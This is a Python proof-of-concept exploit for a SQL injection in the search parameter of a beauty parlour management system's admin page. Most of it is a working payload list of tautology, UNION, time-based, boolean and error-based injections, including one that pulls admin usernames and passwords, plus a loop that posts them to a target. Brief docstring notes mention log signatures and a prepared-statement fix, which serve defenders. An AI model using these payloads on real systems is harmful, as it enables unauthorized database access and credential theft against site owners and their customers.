# CVE-2025-11506 PoC - SQL Injection in PHPGurukul Beauty Parlour Management System 1.1
# Vulnerable file: /admin/search-appointment.php
# Vulnerable parameter: searchdata
import requests
# Target configuration
# Placeholder host; the path is the affected admin search page named in the header.
TARGET_URL: str = "http://target.com/admin/search-appointment.php"
# Injection probe routine; the payload list is defined inside exploit_sqli()
def exploit_sqli(target_url):
    """
    Probe the ``searchdata`` parameter of *target_url* with a fixed list of
    SQL injection strings.

    Every probe is sent as the POST form field ``searchdata``; the run stops
    at the first probe whose HTTP 200 response contains any leak marker.

    Args:
        target_url: Full URL of ``search-appointment.php`` on the instance
            under test.

    Returns:
        ``(True, probe, body)`` for the first probe that trips the marker
        check, otherwise ``(False, None, None)``.

    Notes:
        The marker check is a loose heuristic: ``"admin"`` and ``"password"``
        can appear on an ordinary admin page, so a ``True`` result is not by
        itself proof that the input reached the query unescaped. For
        defenders, the probe strings are distinctive in request logs (a
        quote followed by OR/UNION/SLEEP/extractvalue/updatexml in the
        ``searchdata`` field); the application-side fix is a prepared
        statement for that lookup.
    """
    # Substrings (matched case-insensitively) taken as a sign of leaked
    # database content.
    leak_markers = ("mysql", "version", "root", "admin", "password", "tbladmin")

    probes = [
        # Tautology probes
        "' OR '1'='1",
        "' OR '1'='1' -- ",
        "' OR '1'='1' #",
        # UNION probes: version, database name, table list, admin table
        "' UNION SELECT 1,version(),3,4,5-- ",
        "' UNION SELECT 1,database(),3,4,5-- ",
        "' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- ",
        "' UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 FROM tbladmin-- ",
        # Time-based probes (only observable via latency, never via the marker check)
        "' OR SLEEP(5)-- ",
        "1' AND (SELECT SLEEP(5))-- ",
        # Boolean pair
        "' AND 1=1-- ",
        "' AND 1=2-- ",
        # Error-based probes
        "' AND extractvalue(1,concat(0x7e,version()))-- ",
        "' AND updatexml(1,concat(0x7e,database()),1)-- ",
    ]

    for probe in probes:
        try:
            response = requests.post(
                target_url, data={"searchdata": probe}, timeout=10
            )
            # Anything but 200 is treated as "no signal" for this probe.
            if response.status_code != 200:
                continue
            body = response.text
            if not any(marker in body.lower() for marker in leak_markers):
                continue
            print(f"[+] Successful injection with payload: {probe}")
            print(f"[+] Response snippet: {body[:500]}")
            return True, probe, body
        except Exception as exc:
            # Transport errors are reported and the next probe is tried.
            print(f"[-] Error with payload {probe}: {exc}")

    return False, None, None
def extract_data(target_url):
    """
    Run the injection probe and print a one-line verdict.

    Despite its name this function extracts nothing itself: it delegates to
    ``exploit_sqli`` and reports whether any probe tripped the marker check.

    Args:
        target_url: Accepted for interface compatibility but currently not
            used; the probe is always sent to the module constant
            ``TARGET_URL``.
    """
    print("[*] Starting SQL injection exploitation...")
    found, _probe, _body = exploit_sqli(TARGET_URL)
    verdict = (
        "[+] Database extraction completed successfully"
        if found
        else "[-] Exploitation failed or target not vulnerable"
    )
    print(verdict)
# Script entry point: runs the probe against the hard-coded TARGET_URL.
if __name__ == "__main__":
    extract_data(TARGET_URL)